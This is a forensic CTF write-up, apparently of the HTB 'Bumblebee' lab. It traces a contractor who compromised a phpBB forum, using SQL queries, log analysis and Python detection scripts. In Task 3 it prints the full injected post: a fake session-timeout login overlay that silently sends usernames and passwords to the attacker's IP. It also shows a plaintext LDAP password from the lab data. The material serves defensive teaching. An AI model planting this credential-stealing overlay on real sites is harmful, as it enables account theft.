Task 1
Question: What is the external contractor's username?
An external contractor accessed Forela's internal forum over the guest WiFi, and they appear to have stolen an administrative user's credentials!
To steal an admin user's credentials through the internal forum, the contractor first had to register an ordinary account. Because the access came over the guest WiFi, the registration IP will be an internal (private) address.
1. Open the database in sqlite3
tar -zxvf incident.tgz # extract the evidence archive
sqlite3 phpbb.sqlite3 # open the forum database
2. Inspect the structure of the users table
.tables # list the tables
pragma table_info(phpbb_users); # list the columns of the users table
Two columns are of interest: username and user_password (user_ip, the address recorded at registration, will matter in Task 2).
3. Query the users table
select user_id,username,user_password from phpbb_users;
Answer: apoole1
Task 2
Question: From which IP address did the contractor create the account?
1. Check the table structure for a column that fits (phpbb_users has user_ip)
2. Query the IP
select user_id,user_ip from phpbb_users where username='apoole1';
Answer: 10.10.0.78
Task 3
Question: What is the post_id of the malicious post the contractor published?
1. Check whether a relevant table exists
.tables
2. Inspect the table structure
pragma table_info(phpbb_posts);
3. Dump the table contents
.headers on # show column headers
select * from phpbb_posts;
Three posts exist, with post_id 1, 2 and 9. Posts 1 and 2 are short and benign; post 9 is very long, and its poster_ip is 10.10.0.78, the contractor's registration address from Task 2.
The rows of phpbb_posts rendered as an HTML file (sqlite3's html output mode produces a table like this directly):
<!DOCTYPE html>
<html>
<body>
<table border="1">
<TR>
<TH>post_id</TH>
<TH>topic_id</TH>
<TH>forum_id</TH>
<TH>poster_id</TH>
<TH>icon_id</TH>
<TH>poster_ip</TH>
<TH>post_time</TH>
<TH>post_reported</TH>
<TH>enable_bbcode</TH>
<TH>enable_smilies</TH>
<TH>enable_magic_url</TH>
<TH>enable_sig</TH>
<TH>post_username</TH>
<TH>post_subject</TH>
<TH>post_text</TH>
<TH>post_checksum</TH>
<TH>post_attachment</TH>
<TH>bbcode_bitfield</TH>
<TH>bbcode_uid</TH>
<TH>post_postcount</TH>
<TH>post_edit_time</TH>
<TH>post_edit_reason</TH>
<TH>post_edit_user</TH>
<TH>post_edit_count</TH>
<TH>post_edit_locked</TH>
<TH>post_visibility</TH>
<TH>post_delete_time</TH>
<TH>post_delete_reason</TH>
<TH>post_delete_user</TH>
</TR>
<TR>
<TD>1</TD>
<TD>1</TD>
<TD>2</TD>
<TD>2</TD>
<TD>0</TD>
<TD>10.255.254.2</TD>
<TD>1681296980</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Welcome to phpBB3</TD>
<TD>This is an example post in your phpBB3 installation. Everything seems to be working. You may delete this
post if you like and continue to set up your board. During the installation process your first category
and your first forum are assigned an appropriate set of permissions for the predefined usergroups
administrators, bots, global moderators, guests, registered users and registered COPPA users. If you
also choose to delete your first category and your first forum, do not forget to assign permissions for
all these usergroups for all new categories and forums you create. It is recommended to rename your
first category and your first forum and copy permissions from these while creating new categories and
forums. Have fun!</TD>
<TD>5dd683b17f641daf84c040bfefc58ce9</TD>
<TD>0</TD>
<TD></TD>
<TD></TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>2</TD>
<TD>1681832598</TD>
<TD></TD>
<TD>48</TD>
</TR>
<TR>
<TD>2</TD>
<TD>1</TD>
<TD>2</TD>
<TD>50</TD>
<TD>0</TD>
<TD>10.255.254.2</TD>
<TD>1681832510</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Introduction Randy Savage</TD>
<TD>
<t>Good Afternoon everyone!<br />
<br />
I am new to the administration team here at forela, I'd like to take a minute and say hello!<br />
I have 5 years of administration experience and am ecstatic to be joining this team<br />
<br />
Regards,<br />
Randy
</t>
</TD>
<TD>59bbd9d7e6f899713d7c1da1016e4d25</TD>
<TD>0</TD>
<TD></TD>
<TD>3nk</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1681832532</TD>
<TD></TD>
<TD>48</TD>
</TR>
<TR>
<TD>9</TD>
<TD>2</TD>
<TD>2</TD>
<TD>52</TD>
<TD>0</TD>
<TD>10.10.0.78</TD>
<TD>1682425042</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Hello Everyone</TD>
<TD>
<div>
<style>
body {
z-index: 100;
}
.modal {
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
z-index: 101;
background-color: white;
opacity: 1;
}
.modal.hidden {
visibility: hidden;
}
</style>
<script
type="text/javascript">
function sethidden() {
const d = new Date(); d.setTime(d.getTime() + (24 * 60 * 60 * 1000));
let expires = "expires=" + d.toUTCString(); document.cookie = "phpbb_token=1;" + expires + ";";
var modal = document.getElementById('zbzbz1234');
modal.classList.add("hidden");
}
document.addEventListener("DOMContentLoaded",
function (event) {
let cookieexists = false; let name = "phpbb_token=";
let cookies = decodeURIComponent(document.cookie);
let ca = cookies.split(';');
for (let i = 0; i < ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
cookieexists = true;
}
}
if (cookieexists) { return; }
var modal = document.getElementById('zbzbz1234');
modal.classList.remove("hidden");
}
);
</script>
<iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>
<div class="modal hidden" id="zbzbz1234" onl oad="shouldshow">
<div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a>
<div id="page-header">
<div class="headerbar" role="banner">
<div class="inner">
<div id="site-description" class="site-description"> <a id="logo" class="logo"
href="./index.php" title="Board index"><span
class="site_logo"></span></a>
<h1>forum.forela.co.uk</h1>
<p>Forela internal forum</p>
<p class="skiplink"><a href="#start_here">Skip to content</a></p>
</div>
<div id="search-box" class="search-box search-header" role="search">
<form action="./search.php" method="get" id="search1">
<fieldset> <input name="keywords" id="keywords1" type="search"
maxlength="128" title="Search for keywords"
class="inputbox search tiny" size="20" value=""
placeholder="Search…"> <button class="button button-search"
type="submit" title="Search"> <i class="icon fa-search fa-fw"
aria-hidden="true"></i><span class="sr-only">Search</span>
</button> <a href="./search.php" class="button button-search-end"
title="Advanced search"> <i class="icon fa-cog fa-fw"
aria-hidden="true"></i><span class="sr-only">Advanced
search</span> </a> </fieldset>
</form>
</div>
</div>
</div>
<div class="navbar" role="navigation">
<div class="inner">
<ul id="nav-main" class="nav-main linklist" role="menubar">
<li id="quick-links" class="quick-links dropdown-container responsive-menu"
data-skip-responsive="true"> <a href="#"
class="dropdown-trigger dropdown-toggle"> <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick
links</span> </a>
<div class="dropdown">
<div class="pointer">
<div class="pointer-inner"></div>
</div>
<ul class="dropdown-contents" role="menu">
<li class="separator"></li>
<li> <a href="./search.php?search_id=unanswered"
role="menuitem"> <i
class="icon fa-file-o fa-fw icon-gray"
aria-hidden="true"></i><span>Unanswered
topics</span> </a> </li>
<li> <a href="./search.php?search_id=active_topics"
role="menuitem"> <i
class="icon fa-file-o fa-fw icon-blue"
aria-hidden="true"></i><span>Active topics</span>
</a> </li>
<li class="separator"></li>
<li> <a href="./search.php" role="menuitem"> <i
class="icon fa-search fa-fw"
aria-hidden="true"></i><span>Search</span> </a>
</li>
<li class="separator"></li>
</ul>
</div>
</li>
<li data-skip-responsive="true"> <a href="/phpBB3/app.php/help/faq"
rel="help" title="Frequently Asked Questions" role="menuitem"> <i
class="icon fa-question-circle fa-fw"
aria-hidden="true"></i><span>FAQ</span> </a>
<li class="rightside" data-skip-responsive="true"> <a
href="./ucp.php?mode=login" title="Login" accesskey="x"
role="menuitem"> <i class="icon fa-power-off fa-fw"
aria-hidden="true"></i><span>Login</span> </a> </li>
<li class="rightside" data-skip-responsive="true"> <a
href="./ucp.php?mode=register" role="menuitem"> <i
class="icon fa-pencil-square-o fa-fw"
aria-hidden="true"></i><span>Register</span> </a> </li>
</li data-skip-responsive="true">
</ul>
<ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks"
role="menubar">
<li class="breadcrumbs" itemscope=""
itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">
<span class="crumb" itemtype="http://schema.org/ListItem"
itemprop="itemListElement" itemscope=""><a href="./index.php"
itemtype="https://schema.org/Thing" itemprop="item"
accesskey="h" data-navbar-reference="index"
title="Board index"><i class="icon fa-home fa-fw"></i><span
itemprop="name">Board index</span></a>
<meta itemprop="position" content="1">
</span> </li>
<li class="rightside responsive-search"> <a href="./search.php"
title="View the advanced search options" role="menuitem"> <i
class="icon fa-search fa-fw" aria-hidden="true"></i><span
class="sr-only">Search</span> </a> </li>
</ul>
</div>
</div>
</div> <a id="start_here" class="anchor"></a>
<div id="page-body" class="page-body" role="main">
<div class="panel">
<div class="inner">
<div class="content">
<h3>Session Timeout</h3> <br /> <br />
<p>Your session token has timed out in order to proceed you must login
again.</p>
</div>
</div>
</div>
<form action="http://10.10.0.78/update.php" method="post" id="login"
data-focus="username" target="hiddenframe">
<div class="panel">
<div class="inner">
<div class="content">
<h2 class="login-title">Login</h2>
<fieldset class="fields1">
<dl>
<dt><label for="username">Username:</label></dt>
<dd><input type="text" tabindex="1" name="username"
id="username" size="25" value=""
class="inputbox autowidth"></dd>
</dl>
<dl>
<dt><label for="password">Password:</label></dt>
<dd><input type="password" tabindex="2" id="password"
name="password" size="25" class="inputbox autowidth"
autocomplete="off"></dd>
</dl>
<dl>
<dd><label for="autologin"><input type="checkbox"
name="autologin" id="autologin"
tabindex="4">Remember me</label></dd>
<dd><label for="viewonline"><input type="checkbox"
name="viewonline" id="viewonline" tabindex="5">Hide
my online status this session</label></dd>
</dl>
<dl>
<dt>&nbsp;</dt>
<dd> <input type="submit" name="login" tabindex="6"
value="Login" class="button1" onclick="sethidden()">
</dd>
</dl>
</fieldset class="fields1">
</div>
</div>
</div>
</form>
</div>
<div id="page-footer" class="page-footer" role="contentinfo">
<div class="navbar" role="navigation">
<div class="inner">
<ul id="nav-footer" class="nav-footer linklist" role="menubar">
<li class="breadcrumbs"> <span class="crumb"><a href="./index.php"
data-navbar-reference="index" title="Board index"><i
class="icon fa-home fa-fw"
aria-hidden="true"></i><span>Board index</span></a></span>
</li>
<li class="responsive-menu hidden rightside dropdown-container"><a
href="javascript:void(0);"
class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i
class="icon fa-bars fa-fw" aria-hidden="true"></i></a>
<div class="dropdown">
<div class="pointer">
<div class="pointer-inner"></div>
</div>
<ul class="dropdown-contents"></ul>
</div>
</li>
<li class="rightside">All times are <span title="UTC">UTC</span></li>
<li class="rightside"> <a href="./ucp.php?mode=delete_cookies"
data-ajax="true" data-refresh="true" role="menuitem"> <i
class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete
cookies</span> </a> </li>
</ul>
</div>
</div>
<div class="copyright">
<p class="footer-row"> <span class="footer-copyright">Powered by <a
href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB
Limited</span> </p>
<p class="footer-row"> <a class="footer-link" href="./ucp.php?mode=privacy"
title="Privacy" role="menuitem"> <span
class="footer-link-text">Privacy</span> </a> | <a class="footer-link"
href="./ucp.php?mode=terms" title="Terms" role="menuitem"> <span
class="footer-link-text">Terms</span> </a> </p>
</div>
<div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error"
data-ajax-error-text="Something went wrong when processing your request."
data-ajax-error-text-abort="User aborted request."
data-ajax-error-text-timeout="Your request timed out; please try again."
data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">
<div id="darken" class="darken">&nbsp;</div>
</div>
<div id="phpbb_alert" class="phpbb_alert" data-l-err="Error"
data-l-timeout-processing-req="Request timed out."> <a href="#" class="alert_close">
<i class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
<h3 class="alert_title">&nbsp;</h3>
<p class="alert_text"></p>
</div>
<div id="phpbb_confirm" class="phpbb_alert"> <a href="#" class="alert_close"> <i
class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
<div class="alert_text"></div>
</div>
</div>
</div>
<div> <a id="bottom" class="anchor" accesskey="z"></a> <img
src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron">
</div>
</div><span>Greetings everyone,<br> <br> I am just a visiting IT Contractor, it's a fantastic
company y'all have here.<br> I hope to work with you all again soon.<br> <br> Regards,<br>Alex
Poole</span>
</div>
</TD>
<TD>d2788f4645ab450a05b1832b98d98d0f</TD>
<TD>0</TD>
<TD></TD>
<TD>af1z987</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
</TR>
</table>
</body>
</html>
Answer: 9
Task 4
Question: What is the full URI the credential stealer sends its data to?
1. Open the page
Save the HTML file assembled in Task 3 locally and open it in a browser: it renders as a login form, disguised as a phpBB "Session Timeout" notice.
2. Read the source
The source contains two form elements.
The first form submits to ./search.php, which is the forum's own search box and looks fine; move on to the next one.
The second form submits to http://10.10.0.78/update.php, and 10.10.0.78 is the contractor's IP (Task 2). Its target is the hidden iframe named hiddenframe, so the victim never sees the response, and the script sets a phpbb_token cookie so the fake modal is shown only once per browser, which keeps the phish from being noticed on repeat visits.
Answer: http://10.10.0.78/update.php
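Rather than eyeballing a rendered dump, the checks behind Tasks 3 and 4 can be scripted. The following is an added example, not code from the original write-up or from phpBB: it builds an in-memory SQLite table modelled on the three posts above (the rows are constructed and the bodies abbreviated), then flags any post whose body contains raw script tags, hidden iframes, or a form whose action points off the forum host. The host name forum.forela.co.uk comes from the malicious post's own header; the column subset and the function names are this example's own assumptions.

```python
import sqlite3
from datetime import datetime, timezone
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed rows modelled on the three posts in the dump above; bodies are
# abbreviated. Columns are the subset of phpbb_posts this example needs.
SAMPLE_POSTS = [
    (1, 2, "10.255.254.2", 1681296980, "Welcome to phpBB3",
     "This is an example post in your phpBB3 installation."),
    (2, 50, "10.255.254.2", 1681832510, "Introduction Randy Savage",
     "<t>Good Afternoon everyone!<br />I am new to the administration team.</t>"),
    (9, 52, "10.10.0.78", 1682425042, "Hello Everyone",
     '<div><script type="text/javascript">document.cookie = "phpbb_token=1";</script>'
     '<iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>'
     '<form action="./search.php" method="get"><input name="keywords"></form>'
     '<form action="http://10.10.0.78/update.php" method="post" target="hiddenframe">'
     '<input name="username"><input type="password" name="password"></form>'
     "<span>Greetings everyone, I am just a visiting IT Contractor.</span></div>"),
]


def load_sample_db():
    """Create an in-memory SQLite database holding the constructed posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE phpbb_posts (post_id INTEGER PRIMARY KEY, poster_id INTEGER,"
        " poster_ip TEXT, post_time INTEGER, post_subject TEXT, post_text TEXT)"
    )
    conn.executemany("INSERT INTO phpbb_posts VALUES (?,?,?,?,?,?)", SAMPLE_POSTS)
    return conn


class ActiveContentParser(HTMLParser):
    """Count <script> tags and hidden iframes, and collect every <form action>."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.hidden_iframes = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.scripts += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "iframe" and "display:none" in (a.get("style") or "").replace(" ", ""):
            self.hidden_iframes += 1


def offsite_actions(actions, forum_host):
    """Keep only form targets whose host is neither relative nor the forum itself."""
    return [u for u in actions if urlparse(u).netloc not in ("", forum_host)]


def find_injected_posts(conn, forum_host="forum.forela.co.uk"):
    """Return posts carrying raw active content. phpBB's posting pipeline
    HTML-escapes user input, so a literal <script>/<form>/<iframe> in post_text
    is out of place and deserves a look."""
    findings = []
    rows = conn.execute(
        "SELECT post_id, poster_id, poster_ip, post_time, post_subject, post_text"
        " FROM phpbb_posts ORDER BY post_id"
    )
    for post_id, poster_id, poster_ip, post_time, subject, text in rows:
        p = ActiveContentParser()
        p.feed(text)
        exfil = offsite_actions(p.form_actions, forum_host)
        if p.scripts or p.hidden_iframes or exfil:
            findings.append({
                "post_id": post_id,
                "poster_id": poster_id,
                "poster_ip": poster_ip,
                # post_time is a Unix epoch; render it as UTC
                "post_time_utc": datetime.fromtimestamp(post_time, tz=timezone.utc)
                .strftime("%Y-%m-%d %H:%M:%S"),
                "subject": subject,
                "scripts": p.scripts,
                "hidden_iframes": p.hidden_iframes,
                "exfil_uris": exfil,
            })
    return findings


if __name__ == "__main__":
    for finding in find_injected_posts(load_sample_db()):
        print(finding)
```

Against the real phpbb.sqlite3 the same query runs unchanged (swap the in-memory connection for sqlite3.connect("phpbb.sqlite3")); the off-site form action is what answers Task 4, and the poster_ip on the flagged row ties it back to the account from Task 2.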
Task 5
Question: When did the contractor log in to the forum as an administrator? (UTC)
.tables
There is a phpbb_log table.
.headers on # show column headers
select * from phpbb_log;
The last entries are a login as admin from 10.10.0.78. The column after the IP is log_time, a Unix epoch timestamp (seconds since 1970-01-01 UTC); sqlite3's built-in datetime() function with the 'unixepoch' modifier renders it as a UTC date string.
10.10.0.78 performed three logged operations: a login, then an addition (to a group), then a database backup.
Administrative actions are submitted as POST requests, so filter the web server log for them:
cat access.log | grep 'POST'
In phpbb_log the last login is by 10.10.0.78, so find the last sid (phpBB session id) in the access log.
The last 4 records share the same sid, meaning the attacker performed four POST operations with admin rights. Acting with admin rights requires a login first, so there is 1 login record followed by 4 operation records.
Note: the question asks for UTC, while the access.log timestamps carry a +0100 offset (UTC+1), so subtract one hour from the logged time.
Answer: 26/04/2023 10:53:12
Task 6
Question: The forum holds plaintext credentials for an LDAP connection; what is the password?
select * from phpbb_config;
The LDAP settings are the rows whose config_name starts with ldap; the password sits unencrypted in config_value.
Answer: Passw0rd1
Task 7
Question: What is the administrator user's user agent?
Every line of the access log records a user agent.
We only need to exclude the normal (dominant) user agent:
cat access.log |grep -v 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv'
Cross-check what remains against the source IP and the sid from Task 5 rather than relying on the exclusion alone.
Answer: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8
Question: When did the contractor add themselves to the administrators group? (UTC)
1. Identify the members of the administrators group
select user_id,username,group_id from phpbb_users where group_id = 5;
Two users carry the administrators group (group_id 5): admin and phpbb-admin. Note that phpbb_users.group_id only records a user's default group; full membership is kept in phpbb_user_group, so check that table as well when a default group may have been left unchanged.
2. Check the phpbb_log table
From the previous step, admin has user_id 2 and phpbb-admin has user_id 48. Task 5 already walked through the three operations by 10.10.0.78 in phpbb_log; the second one added the phpbb-admin user to the administrators group.
3. Check the access log
Task 5 also showed that the second POST operation is the one that adds the user to the administrators group:
cat access.log |grep 'mode=manage'
Answer: 26/04/2023 10:53:51
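Tasks 5 and 8 both read phpbb_log and both need log_time converted from epoch seconds to UTC. The following is an added Python example, not from the write-up or from phpBB, that builds a constructed in-memory copy of the three tables involved (phpbb_users, phpbb_user_group and phpbb_log, with only the columns used here) and prints the attacker IP's timeline in the answer format, using SQLite's own 'unixepoch' conversion. The row values mirror the times established above; the log_operation strings are placeholders, and real phpbb_log.log_data is a PHP-serialized array rather than the plain text used here.

```python
import sqlite3

# Constructed rows mirroring the findings in Tasks 5 and 8 (not the real database).
# Only the columns this example uses are modelled; the log_operation strings are
# placeholders and log_data is simplified to plain text.
SAMPLE_USERS = [(2, "admin", 5), (48, "phpbb-admin", 5), (52, "apoole1", 2)]
SAMPLE_USER_GROUP = [(2, 2), (5, 2), (2, 48), (5, 48), (2, 52)]   # (group_id, user_id)
SAMPLE_LOG = [
    # log_id, user_id, log_ip, log_time (epoch seconds), log_operation, log_data
    (101, 2, "10.255.254.2", 1681832400, "LOG_ADMIN_AUTH_SUCCESS", ""),
    (102, 2, "10.10.0.78", 1682506392, "LOG_ADMIN_AUTH_SUCCESS", ""),
    (103, 2, "10.10.0.78", 1682506431, "LOG_GROUP_ADD_USER", "Administrators: phpbb-admin"),
    (104, 2, "10.10.0.78", 1682506898, "LOG_DB_BACKUP", ""),
]
ADMINISTRATORS_GROUP_ID = 5   # phpBB's default id for the Administrators group


def load_sample_db():
    """Create the three constructed tables in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE phpbb_users (user_id INTEGER PRIMARY KEY, username TEXT, group_id INTEGER);
        CREATE TABLE phpbb_user_group (group_id INTEGER, user_id INTEGER);
        CREATE TABLE phpbb_log (log_id INTEGER PRIMARY KEY, user_id INTEGER, log_ip TEXT,
                                log_time INTEGER, log_operation TEXT, log_data TEXT);
    """)
    conn.executemany("INSERT INTO phpbb_users VALUES (?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO phpbb_user_group VALUES (?,?)", SAMPLE_USER_GROUP)
    conn.executemany("INSERT INTO phpbb_log VALUES (?,?,?,?,?,?)", SAMPLE_LOG)
    return conn


def timeline_for_ip(conn, ip):
    """Admin-log entries from one IP, oldest first, with log_time rendered in the
    dd/mm/yyyy HH:MM:SS form the questions use. SQLite's 'unixepoch' modifier does
    the conversion and applies no timezone offset, so the result is UTC."""
    rows = conn.execute(
        "SELECT strftime('%d/%m/%Y %H:%M:%S', l.log_time, 'unixepoch'), u.username,"
        "       l.log_operation, l.log_data"
        "  FROM phpbb_log l JOIN phpbb_users u ON u.user_id = l.user_id"
        " WHERE l.log_ip = ? ORDER BY l.log_time",
        (ip,),
    )
    return [tuple(r) for r in rows]


def admin_group_members(conn):
    """Usernames that are members of the Administrators group. phpbb_users.group_id
    is only a user's default group; the authoritative membership list is
    phpbb_user_group, which is what is queried here."""
    rows = conn.execute(
        "SELECT u.username FROM phpbb_user_group ug"
        "  JOIN phpbb_users u ON u.user_id = ug.user_id"
        " WHERE ug.group_id = ? ORDER BY u.user_id",
        (ADMINISTRATORS_GROUP_ID,),
    )
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = load_sample_db()
    print("Administrators:", admin_group_members(db))
    for entry in timeline_for_ip(db, "10.10.0.78"):
        print(entry)
```

The same two queries can be pasted into the sqlite3 shell against phpbb.sqlite3; the strftime call is the piece that turns the raw log_time column into the answer string without any manual epoch arithmetic.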
Task 9
Question: When did the contractor download the database backup? (UTC)
cat access.log
If you read carefully, you can spot it on the first pass through the log file: the request that downloads the backup file. As in Task 5, subtract one hour from the +0100 timestamp.
Answer: 26/04/2023 11:01:38
Task 10
Question: What is the size, in bytes, of the database backup as recorded in access.log?
cat access.log
This too should be spotted on the first pass: the response-size field of the backup download line found in Task 9.
Answer: 34707
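Tasks 5, 7, 8, 9 and 10 all come out of the same access.log, so one parser serves all of them. The following is an added Python example, not from the write-up: it parses Apache combined-format lines, converts the +0100 timestamps to UTC, groups requests by the phpBB sid parameter, and pulls out the admin login time, the mode=manage request, the backup download with its byte count, and the user agents that differ from the baseline. The sample lines are constructed to match the facts established above; the ACP paths, the sid value and the backup file name are approximations of phpBB's URLs, not the real log.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format lines modelled on the requests described in
# the write-up. Not the real access.log: the ACP paths, the sid and the backup
# file name are approximations of phpBB's URLs.
SAMPLE_LOG = """\
10.255.254.2 - - [26/Apr/2023:11:40:07 +0100] "GET /viewtopic.php?t=2 HTTP/1.1" 200 21574 "http://forum.forela.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.78 - - [26/Apr/2023:11:53:12 +0100] "POST /ucp.php?mode=login HTTP/1.1" 302 402 "http://forum.forela.co.uk/ucp.php?mode=login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
10.10.0.78 - - [26/Apr/2023:11:53:51 +0100] "POST /adm/index.php?i=acp_groups&mode=manage&action=list&g=5&sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 9823 "http://forum.forela.co.uk/adm/index.php?i=acp_groups&mode=manage&sid=0123456789abcdef0123456789abcdef" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /adm/index.php?i=acp_database&mode=backup&action=download&file=backup_1682506885.sql.gz&sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 34707 "http://forum.forela.co.uk/adm/index.php?i=acp_database&mode=backup&sid=0123456789abcdef0123456789abcdef" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
"""

# ip ident authuser [timestamp] "METHOD target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ANSWER_FMT = "%d/%m/%Y %H:%M:%S"   # the dd/mm/yyyy form the questions use


def parse_line(line):
    """One combined-format line -> dict, with the timestamp normalised to UTC."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")   # %z consumes the +0100
    url = urlparse(m["target"])
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {
        "ip": m["ip"],
        "time_utc": ts.astimezone(timezone.utc),
        "method": m["method"],
        "path": url.path,
        "query": query,
        "sid": query.get("sid"),          # phpBB session id, present once logged in
        "status": int(m["status"]),
        "size": None if m["size"] == "-" else int(m["size"]),   # response bytes
        "referer": m["referer"],
        "ua": m["ua"],
    }


def parse_log(text):
    """Parse every non-empty line, drop unparsable ones, sort by UTC time."""
    entries = [parse_line(l) for l in text.splitlines() if l.strip()]
    return sorted((e for e in entries if e), key=lambda e: e["time_utc"])


def fmt(entry):
    return entry["time_utc"].strftime(ANSWER_FMT)


def admin_login_time(entries, ip):
    """Task 5: first POST to ucp.php?mode=login from the IP, rendered in UTC."""
    for e in entries:
        if (e["ip"] == ip and e["method"] == "POST"
                and e["path"].endswith("/ucp.php") and e["query"].get("mode") == "login"):
            return fmt(e)
    return None


def group_change_time(entries, ip):
    """Task 8: the ACP group-management request (mode=manage) from the IP."""
    for e in entries:
        if e["ip"] == ip and e["query"].get("mode") == "manage":
            return fmt(e)
    return None


def backup_download(entries, ip):
    """Tasks 9 and 10: the database backup download and its size in bytes."""
    for e in entries:
        q = e["query"]
        if e["ip"] == ip and q.get("i") == "acp_database" and q.get("action") == "download":
            return fmt(e), e["size"]
    return None


def unusual_user_agents(entries, baseline_prefix):
    """Task 7: user agents that do not share the prefix most of the log uses."""
    return {e["ua"] for e in entries if not e["ua"].startswith(baseline_prefix)}


def sessions_by_sid(entries):
    """Group authenticated requests by sid; one sid is one login session."""
    sessions = {}
    for e in entries:
        if e["sid"]:
            sessions.setdefault(e["sid"], []).append(e)
    return sessions


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("admin login (UTC):", admin_login_time(log, "10.10.0.78"))
    print("group change (UTC):", group_change_time(log, "10.10.0.78"))
    print("backup download (UTC, bytes):", backup_download(log, "10.10.0.78"))
    print("unusual user agents:", unusual_user_agents(log, "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv"))
```

Run against the real file with parse_log(open("access.log").read()); the timezone handling is the part worth keeping, since every answer in this Sherlock is asked in UTC while the log is written in +0100.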
Tags: Task, HTB, view, blue team, Bumblebee, phpbb, post, id, log. Source: https://www.cnblogs.com/IFS-/p/17901030.html